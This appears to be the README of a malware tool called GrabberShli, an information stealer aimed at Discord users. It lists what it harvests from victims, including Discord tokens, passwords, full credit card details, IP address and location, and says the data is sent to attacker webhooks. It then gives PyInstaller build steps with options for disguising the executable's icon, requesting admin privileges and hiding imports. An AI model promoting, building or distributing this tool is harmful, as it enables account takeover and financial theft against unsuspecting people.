🪝 Works with Grabbershli webhooks. Collects data and writes to file. Then it sends the files to the webhooks.
usernameuser idEmailphonenitro typebilling infoospc usernametoken locationipgoogle maps locationcityregionlocal languageif they have verified emailif 2fa is enabledcreation datetheir discord token from all their accounts they havetheir password for discord (you get their password if they update it)all of their credit card info (if they put one in)
pip install -r requirements.txt
Install pyinstaller pip install pyinstaller then go to GrabberShli folder and type
pyinstaller main.py
Add these into the command when creating the exe if you want
| Pyinstaller Options |
|---|
-n name Name that the exe will have (default is the .py file) |
-i icon.ico Icon that the exe will have (do -i NONE for normal executable look) |
--clean Clean PyInstaller cache and remove temporary files before building (recommended) |
--uac-admin Requests admin privileges upon running the exe |
--hidden-import MODULENAME Name an import not visible in the code of the script. Can be used multiple times |